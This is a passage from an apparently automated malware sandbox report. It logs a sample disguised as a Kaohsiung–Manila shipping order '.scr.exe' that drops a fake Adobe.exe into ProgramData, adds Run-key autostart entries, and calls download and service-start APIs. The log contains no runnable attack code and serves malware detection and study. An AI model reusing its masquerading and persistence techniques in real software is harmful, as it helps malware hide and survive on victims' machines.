                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: uoct.pdbSHA2567B source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, Adobe.exe.3.dr
                    Source: Binary string: uoct.pdb source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, Adobe.exe.3.dr
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: 0xD7610664 [Mon Jul 3 10:54:28 2084 UTC]
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041BCE3
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_02BBEFB0 push esp; iretd 0_2_02BBEFB1
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004567E0 push eax; ret 3_2_004567FE
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0045B9DD push esi; ret 3_2_0045B9E6
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00463EF3 push ds; retf 3_2_00463EEC
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00455EAF push ecx; ret 3_2_00455EC2
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00433FF6 push ecx; ret 3_2_00434009
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 4_2_0094EFB0 push esp; iretd 4_2_0094EFB1
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 8_2_02D2EFB0 push esp; iretd 8_2_02D2EFB1
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 11_2_00B9EFB0 push esp; iretd 11_2_00B9EFB1
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 13_2_0151EFB0 push esp; iretd 13_2_0151EFB1
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: section name: .text entropy: 7.871355192949315
                    Source: Adobe.exe.3.drStatic PE information: section name: .text entropy: 7.871355192949315

                    Persistence and Installation Behavior

                    barindex
                    Drops executable to a common third party application directory
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile written: C:\ProgramData\Adobe\Adobe.exeJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00406128 ShellExecuteW,URLDownloadToFileW,3_2_00406128
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile created: \#u4f73#u5ddd#u7acb 20241202 kaohsiung-manila north port 1x20' so.scr.exe
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile created: \#u4f73#u5ddd#u7acb 20241202 kaohsiung-manila north port 1x20' so.scr.exe
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile created: \#u4f73#u5ddd#u7acb 20241202 kaohsiung-manila north port 1x20' so.scr.exeJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile created: \#u4f73#u5ddd#u7acb 20241202 kaohsiung-manila north port 1x20' so.scr.exeJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile created: C:\ProgramData\Adobe\Adobe.exeJump to dropped file
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile created: C:\ProgramData\Adobe\Adobe.exeJump to dropped file

                    Boot Survival

                    barindex
                    Creates autostart registry keys with suspicious names
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WNJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_00419BC4
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WNJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WNJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WNJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WNJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041BCE3
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
